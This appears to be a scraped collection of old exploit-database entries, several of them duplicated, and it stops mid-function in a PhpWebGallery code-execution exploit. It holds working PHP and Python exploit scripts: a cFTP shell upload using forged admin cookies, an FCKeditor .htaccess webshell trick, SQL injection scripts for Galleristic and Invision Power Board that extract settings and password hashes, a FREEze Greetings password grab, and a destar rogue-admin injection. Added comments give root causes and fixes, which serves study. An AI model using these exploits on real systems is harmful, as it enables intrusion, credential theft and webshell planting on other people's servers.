leviathan/cFTP <= 0.1 (r80) Arbitrary File Upload ( php)
<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
// Vulnerable URL
// Base URL of the cFTP install under test; the bracketed placeholder is filled in by hand.
$url = 'http://[url domain]/cFTP/';
// The file to upload
// Local path of the file sent through the upload form; its basename is reused later to locate it.
$filename = dirname(__FILE__).'/info.php';
// Extensions appended to the application's allowed-upload list (see the 'allowed_file_types' handling below).
$failext = array('php', 'pl');
// rand() only makes the throw-away client name unique per run; nothing security-relevant depends on it.
$username = 'hackname'.rand(0, 999999);
// Every request below carries these cookie values (CURLOPT_COOKIE) and there is no login step at all:
// the application apparently derives the caller's role/level from client-supplied cookies.
// Server-side mitigation: keep authorisation state in the server session, never in cookies the client controls.
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)
/**
 * Issue one HTTP POST carrying the given Cookie header and optional form fields.
 *
 * @param string     $url               Absolute URL to request.
 * @param string     $cookies_injection Raw value of the Cookie request header.
 * @param array|null $inputs            POST fields; when not an array no body is set
 *                                      (the request is still sent as POST).
 * @return array [body or false, curl_getinfo() array, curl_errno(), curl_error()]
 */
function curl_call_url($url, $cookies_injection, $inputs = null)
{
    $handle = curl_init();
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_HEADER => false,
        CURLOPT_POST => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIE => $cookies_injection,
    );
    if (is_array($inputs)) {
        // Array form is sent as multipart/form-data, which the file upload below relies on.
        $options[CURLOPT_POSTFIELDS] = $inputs;
    }
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    $info = curl_getinfo($handle);
    $errno = curl_errno($handle);
    $errstr = curl_error($handle);
    curl_close($handle);
    return array($body, $info, $errno, $errstr);
}
// Add vulnerable extensions (php, pl : defined in $failext)
// Step 1: fetch the admin options form (authenticated only by the forged cookie).
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);
// Scrape every <input ... name="..." ... value="..."> so the whole form can be re-posted.
// Inputs whose value attribute precedes name, or is empty, do not match and are dropped from the repost.
if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) {
$input = array();
$count = count($matches[0]);
for ($i = 0; $i < $count; $i++) {
$input[$matches[2][$i]] = $matches[4][$i];
// The allowed-upload list is an ordinary editable form field: append each extension from
// $failext that is not already present (strpos is a substring test, so 'php' also matches
// e.g. 'php3') and re-join with '|', the separator the application apparently expects on input.
// Server-side mitigation: enforce the upload allow-list from a fixed server-side configuration
// and store uploads where the web server will not execute them.
if ($matches[2][$i] === 'allowed_file_types') {
foreach ($failext as $ext) {
if (strpos($matches[4][$i], $ext) === false) {
$input[$matches[2][$i]] .= ','.$ext;
}
}
$input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
}
}
// add select
// The timezone <select> is not an <input>; the first selected <option> anywhere in the page
// is assumed to be it — TODO confirm against the form markup.
if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) {
$input['timezone'] = $matches[1];
} else {
$input['timezone'] = 'America/Argentina/Buenos_Aires';
}
// Validate the form to add the vulnerables extensions
// Step 2: post the modified options. Success is detected by the 'message_ok' marker in the
// response body, as for every form below.
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Add new client : required to upload the file
// Step 3: create a throw-away client account; uploads are filed under a client name.
$input = array(
'add_client_form_name' => $username,
'add_client_form_user' => $username,
'add_client_form_pass' => 'hackname',
'add_client_form_pass2' => 'hackname',
'add_client_form_address' => 'my address',
'add_client_form_phone' => '000-000-000',
//'add_client_form_notify' => '0',
'add_client_form_email' => $username.'@example.com',
'add_client_form_intcont' => '',
'Submit' => 'Create account',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Now upload file :-)
// Step 4: upload the file. The '@'-prefixed path is the legacy cURL file-upload convention
// (removed in PHP 7.0), sent as multipart/form-data.
$input = array(
'name' => 'my_hack_file',
'description' => 'It\'s my hack file',
'clientname' => $username,
'ufile' => '@'.$filename,
'Submit' => 'Upload',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
// Step 5: the success page links to the client's file list; fetch it and look for a link
// ending in the uploaded basename to print its final URL.
if (preg_match('#<a href="([^"]+)">File uploaded correctly#', $response, $matches)) {
// get filename
list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
if (preg_match('#<a href="([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
} else {
// On every failure path the raw response is dumped to help see what the server answered.
var_dump($response);
echo 'fail to hack : where is the file !!!';
}
} else {
var_dump($response);
echo 'fail to hack : file not uploaded';
}
} else {
var_dump($response);
echo 'fail to hack : client not created';
}
} else {
var_dump($response);
echo 'fail to hack : options not changed';
}
} else {
var_dump($response);
echo 'fail to hack : no input';
}
leviathan/cFTP 0.1 r80 Shell Upload ( na)
<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
// Vulnerable URL
// Base URL of the cFTP install under test; the bracketed placeholder is filled in by hand.
$url = 'http://[url domain]/cFTP/';
// The file to upload
// Local path of the file sent through the upload form; its basename is reused later to locate it.
$filename = dirname(__FILE__).'/info.php';
// Extensions appended to the application's allowed-upload list (see the 'allowed_file_types' handling below).
$failext = array('php', 'pl');
// rand() only makes the throw-away client name unique per run; nothing security-relevant depends on it.
$username = 'hackname'.rand(0, 999999);
// Every request below carries these cookie values (CURLOPT_COOKIE) and there is no login step at all:
// the application apparently derives the caller's role/level from client-supplied cookies.
// Server-side mitigation: keep authorisation state in the server session, never in cookies the client controls.
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)
/**
 * Issue one HTTP POST carrying the given Cookie header and optional form fields.
 *
 * @param string     $url               Absolute URL to request.
 * @param string     $cookies_injection Raw value of the Cookie request header.
 * @param array|null $inputs            POST fields; when not an array no body is set
 *                                      (the request is still sent as POST).
 * @return array [body or false, curl_getinfo() array, curl_errno(), curl_error()]
 */
function curl_call_url($url, $cookies_injection, $inputs = null)
{
    $handle = curl_init();
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_HEADER => false,
        CURLOPT_POST => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIE => $cookies_injection,
    );
    if (is_array($inputs)) {
        // Array form is sent as multipart/form-data, which the file upload below relies on.
        $options[CURLOPT_POSTFIELDS] = $inputs;
    }
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    $info = curl_getinfo($handle);
    $errno = curl_errno($handle);
    $errstr = curl_error($handle);
    curl_close($handle);
    return array($body, $info, $errno, $errstr);
}
// Add vulnerable extensions (php, pl : defined in $failext)
// Step 1: fetch the admin options form (authenticated only by the forged cookie).
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);
// Scrape every <input ... name="..." ... value="..."> so the whole form can be re-posted.
// Inputs whose value attribute precedes name, or is empty, do not match and are dropped from the repost.
if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) {
$input = array();
$count = count($matches[0]);
for ($i = 0; $i < $count; $i++) {
$input[$matches[2][$i]] = $matches[4][$i];
// The allowed-upload list is an ordinary editable form field: append each extension from
// $failext that is not already present (strpos is a substring test, so 'php' also matches
// e.g. 'php3') and re-join with '|', the separator the application apparently expects on input.
// Server-side mitigation: enforce the upload allow-list from a fixed server-side configuration
// and store uploads where the web server will not execute them.
if ($matches[2][$i] === 'allowed_file_types') {
foreach ($failext as $ext) {
if (strpos($matches[4][$i], $ext) === false) {
$input[$matches[2][$i]] .= ','.$ext;
}
}
$input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
}
}
// add select
// The timezone <select> is not an <input>; the first selected <option> anywhere in the page
// is assumed to be it — TODO confirm against the form markup.
if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) {
$input['timezone'] = $matches[1];
} else {
$input['timezone'] = 'America/Argentina/Buenos_Aires';
}
// Validate the form to add the vulnerables extensions
// Step 2: post the modified options. Success is detected by the 'message_ok' marker in the
// response body, as for every form below.
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Add new client : required to upload the file
// Step 3: create a throw-away client account; uploads are filed under a client name.
$input = array(
'add_client_form_name' => $username,
'add_client_form_user' => $username,
'add_client_form_pass' => 'hackname',
'add_client_form_pass2' => 'hackname',
'add_client_form_address' => 'my address',
'add_client_form_phone' => '000-000-000',
//'add_client_form_notify' => '0',
'add_client_form_email' => $username.'@example.com',
'add_client_form_intcont' => '',
'Submit' => 'Create account',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Now upload file :-)
// Step 4: upload the file. The '@'-prefixed path is the legacy cURL file-upload convention
// (removed in PHP 7.0), sent as multipart/form-data.
$input = array(
'name' => 'my_hack_file',
'description' => 'It\'s my hack file',
'clientname' => $username,
'ufile' => '@'.$filename,
'Submit' => 'Upload',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
// Step 5: the success page links to the client's file list; fetch it and look for a link
// ending in the uploaded basename to print its final URL.
if (preg_match('#<a href="([^"]+)">File uploaded correctly#', $response, $matches)) {
// get filename
list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
if (preg_match('#<a href="([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
} else {
// On every failure path the raw response is dumped to help see what the server answered.
var_dump($response);
echo 'fail to hack : where is the file !!!';
}
} else {
var_dump($response);
echo 'fail to hack : file not uploaded';
}
} else {
var_dump($response);
echo 'fail to hack : client not created';
}
} else {
var_dump($response);
echo 'fail to hack : options not changed';
}
} else {
var_dump($response);
echo 'fail to hack : no input';
}
cFTP versions 0.1 r80 and below suffer from a shell upload vulnerability.
pentesters.ir/FCKeditor all versian Arbitrary File Upload Vulnerability ( php)
In The Name Of GOD [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011 [+] script:http://sourceforge.net/projects/fckeditor/ [+] Author : pentesters.ir [+] Website : WwW.PenTesters.IR --------------------------------------------------------- 1.create a htaccess file: code: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.Now upload this htaccess with FCKeditor. http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html ---------------------------------------------------------------------------------------------- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically. 5.http://target.com/anything/shell_php.gif 6.Now shell is available from server. ---------------------------------------------------------
Pentesters.ir/FCKeditor Shell Upload ( na)
In The Name Of GOD [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011 [+] script:http://sourceforge.net/projects/fckeditor/ [+] Author : pentesters.ir [+] Website : WwW.PenTesters.IR --------------------------------------------------------- 1.create a htaccess file: code: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.Now upload this htaccess with FCKeditor. http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html ---------------------------------------------------------------------------------------------- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically. 5.http://target.com/anything/shell_php.gif 6.Now shell is available from server. ---------------------------------------------------------
FCKeditor suffers from a shell upload vulnerability when a specially crafted htaccess file is used.
cOndemned/Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit ( php)
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
/**
 * Read one gallery_settings row through the unquoted `cat` parameter of index.php.
 *
 * Root cause on the server: `cat` is concatenated into a quoted SQL string without
 * validation; the header note says this only works with magic_quotes_gpc off because the
 * quote is sent raw. Fix is an integer cast / parameterised query on the application side.
 *
 * @param string $target base URL of the Galleristic install (as given in the usage note)
 * @param int    $v      gallery_settings.id to read
 * @return string|null captured value followed by '<br />', or null when no response line
 *                     matched (the loop falls through without a return)
 */
function exploit($target, $v) {
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
// file() fetches the URL through the HTTP stream wrapper (needs allow_url_fopen). $target comes
// straight from $_GET in the caller, so if this script is hosted it will request any URL it is given.
$request = file($target . $injection);
// Look for a single-quoted value right before </h2>, where the page apparently echoes the selected category.
for($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
if(!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
// Entry point: requires the `target` query parameter (empty() also rejects "0").
if(empty($_GET['target'])) {
die('No target site specified!');
}
else {
// Rows id 1 and 2 of gallery_settings are read (loop runs for $c = 1, 2). Output is raw
// HTML from the remote page, echoed unescaped — this script itself reflects untrusted content.
for($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
# milw0rm.com [2008-05-07]
cOndemned/galleristic-sql.txt ( na)
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
/**
 * Read one gallery_settings row through the unquoted `cat` parameter of index.php.
 *
 * Root cause on the server: `cat` is concatenated into a quoted SQL string without
 * validation; the header note says this only works with magic_quotes_gpc off because the
 * quote is sent raw. Fix is an integer cast / parameterised query on the application side.
 *
 * @param string $target base URL of the Galleristic install (as given in the usage note)
 * @param int    $v      gallery_settings.id to read
 * @return string|null captured value followed by '<br />', or null when no response line
 *                     matched (the loop falls through without a return)
 */
function exploit($target, $v) {
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
// file() fetches the URL through the HTTP stream wrapper (needs allow_url_fopen). $target comes
// straight from $_GET in the caller, so if this script is hosted it will request any URL it is given.
$request = file($target . $injection);
// Look for a single-quoted value right before </h2>, where the page apparently echoes the selected category.
for($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
if(!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
// Entry point: requires the `target` query parameter (empty() also rejects "0").
if(empty($_GET['target'])) {
die('No target site specified!');
}
else {
// Rows id 1 and 2 of gallery_settings are read (loop runs for $c = 1, 2). Output is raw
// HTML from the remote page, echoed unescaped — this script itself reflects untrusted content.
for($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
Galleristic version 1.0 remote SQL injection exploit that makes use of index.php.
n/a/Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working) ( php)
<?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
// Member id whose password hash is extracted, one hex character per position.
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
// Candidate alphabet: the stored hash is 32 hex characters.
$hex = "0123456789abcdef";
// Boolean (blind) injection through the autologin cookie: for each of the 32 positions, try
// hex digits until the login no longer redirects to CODE=00 (the failed-login page).
// Notes: $hash is never initialised before ".=", and the inner loop has no upper bound — if no
// digit matches, $idx runs past the alphabet (substr returns '') and the loop never ends.
// Detection on the server: autologin requests whose pass_hash cookie contains SQL fragments
// (HAVING, MID, OR id=) or a burst of many such requests from one client.
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
// Root cause: the cookie value is URL-decoded again after the magic_quotes escaping step and
// then concatenated into SQL, so a double-encoded quote survives. The application-side fix is
// a parameterised query (escaping must follow every decoding step, not precede it).
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
// Oracle: a redirect to CODE=00 means the row did not match; anything else counts as a hit
// (including the "Unknown" string getHeader() returns when the connection fails).
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
/**
 * Send a HEAD request with the given Cookie header and return the raw response headers.
 * Returns the string "Unknown" when the TCP connection cannot be opened.
 * Caveats: $header is never initialised before ".=", and the read loop only stops on the
 * "\r\n\r\n" terminator — if the peer closes first, fread() keeps returning '' at EOF and the
 * loop never ends (there is no feof() or timeout check).
 *
 * @param string $server host name (resolved with gethostbyname, which returns it unchanged on failure)
 * @param int    $port   TCP port
 * @param string $file   request target (path + query)
 * @param string $cookie raw Cookie header value
 * @return string raw headers, or "Unknown"
 */
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
// Minimal HTTP/1.1 HEAD request; "Connection: close" asks the server to end the exchange.
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
// Accumulate 512-byte chunks until the blank line that ends the header block.
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
// milw0rm.com [2005-06-08]
/invision.php.txt ( na)
<?php
/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
// Member id whose password hash is extracted, one hex character per position.
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
// Candidate alphabet: the stored hash is 32 hex characters.
$hex = "0123456789abcdef";
// Boolean (blind) injection through the autologin cookie: for each of the 32 positions, try
// hex digits until the login no longer redirects to CODE=00 (the failed-login page).
// Notes: $hash is never initialised before ".=", and the inner loop has no upper bound — if no
// digit matches, $idx runs past the alphabet (substr returns '') and the loop never ends.
// Detection on the server: autologin requests whose pass_hash cookie contains SQL fragments
// (HAVING, MID, OR id=) or a burst of many such requests from one client.
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
// Root cause: the cookie value is URL-decoded again after the magic_quotes escaping step and
// then concatenated into SQL, so a double-encoded quote survives. The application-side fix is
// a parameterised query (escaping must follow every decoding step, not precede it).
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
// Oracle: a redirect to CODE=00 means the row did not match; anything else counts as a hit
// (including the "Unknown" string getHeader() returns when the connection fails).
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
/**
 * Send a HEAD request with the given Cookie header and return the raw response headers.
 * Returns the string "Unknown" when the TCP connection cannot be opened.
 * Caveats: $header is never initialised before ".=", and the read loop only stops on the
 * "\r\n\r\n" terminator — if the peer closes first, fread() keeps returning '' at EOF and the
 * loop never ends (there is no feof() or timeout check).
 *
 * @param string $server host name (resolved with gethostbyname, which returns it unchanged on failure)
 * @param int    $port   TCP port
 * @param string $file   request target (path + query)
 * @param string $cookie raw Cookie header value
 * @return string raw headers, or "Unknown"
 */
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
// Minimal HTTP/1.1 HEAD request; "Connection: close" asks the server to end the exchange.
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
// Accumulate 512-byte chunks until the blank line that ends the header block.
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
Invision Power Board versions 2.0.3 and below Login.PHP SQL injection exploit.
cOndemned/FREEze Greetings 1.0 Remote Password Retrieve Exploit ( php)
<?php
/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8
*/
// Banner (heredoc; the closing marker must stay at column 0 for this PHP version).
echo <<< Header
[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]
Header;
// Exactly one argument is required. `printf(...) and exit`: printf returns the number of bytes
// written (non-zero), so `exit` runs right after the usage text is printed.
if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit;
// Root cause: pwd.txt sits inside the web root and is readable anonymously, and its content is
// base64 text whose decoded form starts with a second base64 string delimited by "||" — the
// admin password in reversible form (hence the two base64_decode() calls, no secret involved).
// Application-side mitigation: keep credential files outside the document root (or deny them in
// the web server) and store a password hash instead of an encoding.
// Note: the 'e' modifier on both patterns was removed in PHP 7, where these preg_match() calls
// fail to compile and return false — confirm on the interpreter used.
$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
printf("[~] %s \r\n\r\n", $out);
?>
# milw0rm.com [2008-11-17]
cOndemned/freezegreetings-password.txt ( na)
<?php
/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8
*/
// Banner (heredoc; the closing marker must stay at column 0 for this PHP version).
echo <<< Header
[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]
Header;
// Exactly one argument is required. `printf(...) and exit`: printf returns the number of bytes
// written (non-zero), so `exit` runs right after the usage text is printed.
if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit;
// Root cause: pwd.txt sits inside the web root and is readable anonymously, and its content is
// base64 text whose decoded form starts with a second base64 string delimited by "||" — the
// admin password in reversible form (hence the two base64_decode() calls, no secret involved).
// Application-side mitigation: keep credential files outside the document root (or deny them in
// the web server) and store a password hash instead of an encoding.
// Note: the 'e' modifier on both patterns was removed in PHP 7, where these preg_match() calls
// fail to compile and return false — confirm on the interpreter used.
$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
printf("[~] %s \r\n\r\n", $out);
?>
FREEze Greetings version 1.0 remote password retrieval exploit.
nonroot/destar 0.2.2-5 Arbitrary Add Admin User Exploit ( php)
#
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and exploit coded by a non root user
# http://nonroot.blogspot.com/
#
# Enero 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib, sys and re
#
import urllib
import sys,re
# Python 2 script (print statements, raw_input, urllib.urlopen). The shebang above is not on
# line 1 of the file, so it is not honoured; run it as `python exploit_code.py` per the usage note.
print "Target host: i.e: http://127.0.0.1:8080/"
# Interactive inputs: base URL (with trailing slash) and the credentials of an ordinary user.
host=raw_input("Target host ( include http and /): ")
user=raw_input("A normal user for destar:")
password=raw_input("A normal password for destar:")
null=""
print "trying ..."
loggin = urllib.urlencode({'name': user, 'pw': password})
# The 'pin' field is the injection point: its value closes the configuration call the
# application writes and appends further CfgOptUser(...) / CfgPhoneSip(...) calls, which means
# the settings file is apparently emitted as executable Python without escaping user input
# (inferred from the payload shape — confirm against the destar source). Root cause: user data
# serialised into code; the application-side fix is to validate 'pin' as digits and to persist
# settings as data (not as source that is later imported).
attack = urllib.urlencode({'cfim': null, 'cfbs': null, 'cfto': null, 'dsec' : '45', 'vmim' : 'yes','vmbs' : 'yes', 'vmu' : 'yes', 'pin' : '1234,) ; CfgOptUser(name="theroot",secret="theroot",pc="200.75.43.187",phone="agent1",pbx="pbx1",level="4",language="en",) ; CfgPhoneSip(pbx="pbx1000",name="OpenBSD-Agent",secret="imsecure",ext= "2999",dtmfmode = "rfc2833",enablecallgroup = True,callgroup = "1",queues="queue1",panel= True' })
# Log in; the literal "'User'" in the returned page is taken as proof the credentials worked.
response= urllib.urlopen(host+"login/", loggin)
data=response.read()
lookup=re.compile("'User'").search
match=lookup(data)
if match:
print user,"logged, now trying exploit"
else:
print "Password invalid, try again."
sys.exit(2)
# Post the settings form. urlopen returns an object for any completed request, so this branch
# only means the request went through, not that the injection took effect.
response= urllib.urlopen(host+"user/settings/", attack)
if response:
print "ok, attack was done, now i will try loggin like 'theroot'"
user='theroot'
password='theroot'
loggin = urllib.urlencode({'name': user, 'pw': password})
response= urllib.urlopen(host+"login/", loggin)
data=response.read()
# The injected account has level="4", which the page apparently labels 'Programmer'.
lookup=re.compile("'Programmer'").search
match=lookup(data)
if match:
# host already ends with '/', so this prints a double slash before 'user'.
print "Exploit ok. try: ",host+"/user/info"
else:
# The new configuration is only picked up once the service re-reads it (see message).
print "Exploit failed, sorry, maybe you need that the sysadmin restart destar, be patient!"
sys.exit(2)
else:
print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
sys.exit(2)
# milw0rm.com [2008-03-24]
EgiX/PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit ( php)
<?php
/*
------------------------------------------------------------------------
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.phpwebgallery.net/
details..: works with at least two rows in _comments table
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /plugins/event_tracer/event_list.php
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;
61. usort(
62. $events,
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )
64. );
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
access to the plugins management interface, but the attacker might be able to retrieve a valid
admin session id using the SQL injection bug in comments.php (see lines 325-340)
*/
// Silence every notice/warning (several would otherwise print: undefined variables, define() misuse).
error_reporting(0);
set_time_limit(0);
// Read timeout, in seconds, for the fsockopen()/fread() calls in http_send().
ini_set("default_socket_timeout",5);
// Bare constant names are passed to define(). On the CLI, STDIN is already a predefined resource
// constant, so this define() fails (hidden by error_reporting(0)) and fgets(STDIN) below uses the
// built-in handle. PATTERN is undefined: PHP 5/7 treat the bare name as the string 'PATTERN'
// (with a notice), while PHP 8 raises an Error — so this script needs PHP 5/7. — confirm
define(STDIN, fopen("php://stdin", "r"));
// Regex for the comment author cell rendered by comments.php; the blind-SQLi oracle below
// compares what lands in this capture.
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");
/**
 * Send one raw HTTP request to $host:80 and return the complete raw response (headers + body).
 * Retries the TCP connect without any cap until it succeeds, then reads to EOF — so the request
 * text must carry "Connection: close" (every caller does).
 *
 * @param string $host   target host name or IP
 * @param string $packet complete request text including the terminating blank line
 * @return string raw response
 */
function http_send($host, $packet)
{
    do {
